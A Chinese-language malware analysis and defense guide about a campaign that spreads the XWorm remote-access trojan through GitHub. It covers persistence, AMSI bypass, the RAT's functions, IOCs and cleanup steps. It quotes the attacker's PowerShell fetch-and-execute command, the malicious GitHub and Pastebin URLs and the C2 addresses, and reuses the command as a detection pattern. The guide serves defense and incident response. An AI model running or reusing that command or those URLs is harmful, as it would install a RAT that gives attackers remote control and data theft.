未知攻击团伙利用github传播XWorm恶意软件
字数 2396 2025-08-24 23:51:09
XWorm恶意软件分析与防御指南
一、概述
近期发现一个通过GitHub传播XWorm恶意软件的威胁活动,攻击者利用GitHub项目托管恶意代码,通过一系列复杂的技术手段最终在受害者机器上部署XWorm RAT(远程访问木马)。本指南将详细分析攻击流程、技术细节,并提供防御建议。
二、攻击流程分析
1. 初始感染阶段
- 传播途径:通过GitHub项目托管恶意文件
- 初始样本:createassembly.txt
- 创建时间:2024年5月12日创建并更新
2. 持久化机制
- 注册表修改:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Driver Diag 值: REGSVR32 /s DriverDiagnosis - 文件释放:在%temp%目录释放隐藏COM组件文件DriverDiagnosis.dll
3. 载荷执行链
- 初始样本执行后加载DriverDiagnosis.dll
- DLL文件通过PowerShell获取后续载荷:
powershell.exe -windowstyle h -command iex(iwr t.ly/8evEY) - 短链接解析到GitHub上的恶意脚本:
https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt
三、技术细节分析
1. AMSI绕过技术
样本采用多种技术绕过Windows反恶意软件扫描接口(AMSI):
- 使用内存修补技术修改AMSI相关函数
- 采用编码/混淆方式隐藏恶意代码
- 通过PowerShell反射加载恶意代码
2. 内存加载技术
攻击者使用多种内存加载技术:
-
直接内存加载PE文件:
- 从文本文件中解码出PE文件并直接映射到内存执行
- 文件大小:61,952字节(gaber.txt_decryptedBytes_RAT)
-
Shellcode加载:
- 先加载小型shellcode
- 由shellcode在内存中加载最终XWorm RAT
- 文件大小:36,864字节(efawef_shellcode_RAT)
3. XWorm RAT功能分析
配置信息
样本中发现的配置信息格式:
<C2地址><端口><密码><ID><版本信息>
示例:
localbeheaders.mcgo.io:4411<123456789><Xwormmm>IVANofficialUSB.exe
198.23.187.140:4646<123456789><Xwormmm>XWorm V5.0USB.exe
主要功能
-
基础功能:
- 进程管理(启动/终止)
- 文件系统操作
- 屏幕截图捕获
- 键盘记录
-
网络功能:
- 从URL下载文件
- 通过浏览器打开指定网页
- DDoS攻击能力(StartDDos/StopDDos指令)
-
系统控制:
- 关机/重启/注销
- 程序更新/卸载
- PowerShell命令执行
-
插件架构:
- 支持动态加载插件DLL扩展功能
- 插件可能包括:高级键盘记录、密码窃取等
4. 混淆与反分析技术
- 使用代码混淆工具处理.NET程序集
- 关键字符串加密存储
- 使用de4dot工具可进行去混淆处理
四、IOC(入侵指标)
文件哈希
| 文件名 | MD5哈希 |
|---|---|
| createassembly.txt | 2AE2FC8AA260167415BFEBC1078C5092 |
| DriverDiagnosis.dll | 4C9368DBF637B37674AF658B5F73232D |
| gaber.txt | 05110972AD5B31B3B5AB8D3E82E0B283 |
| gaber.txt_decryptedBytes_RAT | 7B87DC448C231FDA9F181AE2BBFA5D13 |
| customer_p4yl0ad.txt | 97896726D7BB3027938500F395C529B6 |
| customer_p4yl0ad.txt_decryptedbytes_RAT | ADA55D22F9AED7DDEE6E9AC5B78F164D |
| efawef.txt | 97B92BADF904B5D3CB95EA7F72591BA1 |
| efawef_shellcode_RAT | F14391D4B59BF55E05357D5A585C5138 |
网络指标
- 短链接:t.ly/8evEY
- GitHub仓库:
https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt - Pastebin链接:
https://pastebin.com/raw/zNCj2Utm - C2服务器:
localbeheaders.mcgo.io:4411 198.23.187.140:4646
PDB路径
C:\Users\Administrator.ADMINISTRATOR\Desktop\CMDLL-master\x64\Release\Cmd.pdb
五、检测与防御措施
1. 检测方法
-
注册表监控:
- 监控HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run下的异常项
- 特别关注包含"REGSVR32 /s"命令的启动项
-
文件系统监控:
- 监控%TEMP%目录下创建的隐藏COM组件文件
- 查找名为DriverDiagnosis.dll的可疑文件
-
进程监控:
- 检测异常PowerShell进程执行:
powershell.exe -windowstyle h -command iex(iwr *)
- 检测异常PowerShell进程执行:
-
网络流量监控:
- 检测与已知C2服务器(localbeheaders.mcgo.io, 198.23.187.140)的连接
- 监控对pastebin.com和GitHub特定仓库的访问
2. 防御措施
-
应用程序控制:
- 限制PowerShell执行策略
- 禁止从临时目录执行DLL文件
-
AMSI增强:
- 启用并配置AMSI高级保护
- 监控AMSI绕过尝试
-
用户教育:
- 警惕不明来源的GitHub项目
- 不随意点击短链接
-
系统加固:
- 禁用不必要的COM组件
- 限制注册表修改权限
六、分析与清除工具
1. 分析工具
- de4dot:用于.NET程序反混淆
- PEiD:检测加壳/混淆的PE文件
- Process Monitor:监控文件、注册表和进程活动
2. 清除步骤
-
终止相关进程:
- 查找并终止异常的PowerShell进程
- 终止可疑的svchost或rundll32进程
-
删除持久化项:
- 删除注册表中的恶意启动项:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Driver Diag
- 删除注册表中的恶意启动项:
-
删除恶意文件:
- 清理%TEMP%目录下的DriverDiagnosis.dll
- 删除其他已识别的恶意文件
-
网络隔离:
- 阻断与C2服务器的通信
- 检查系统代理设置
七、总结
此次攻击活动展示了攻击者如何利用合法平台(GitHub)托管恶意代码,通过多阶段加载技术绕过安全防护,最终部署功能强大的XWorm RAT。防御此类攻击需要多层防护策略,包括严格的应用程序控制、增强的AMSI保护和持续的网络监控。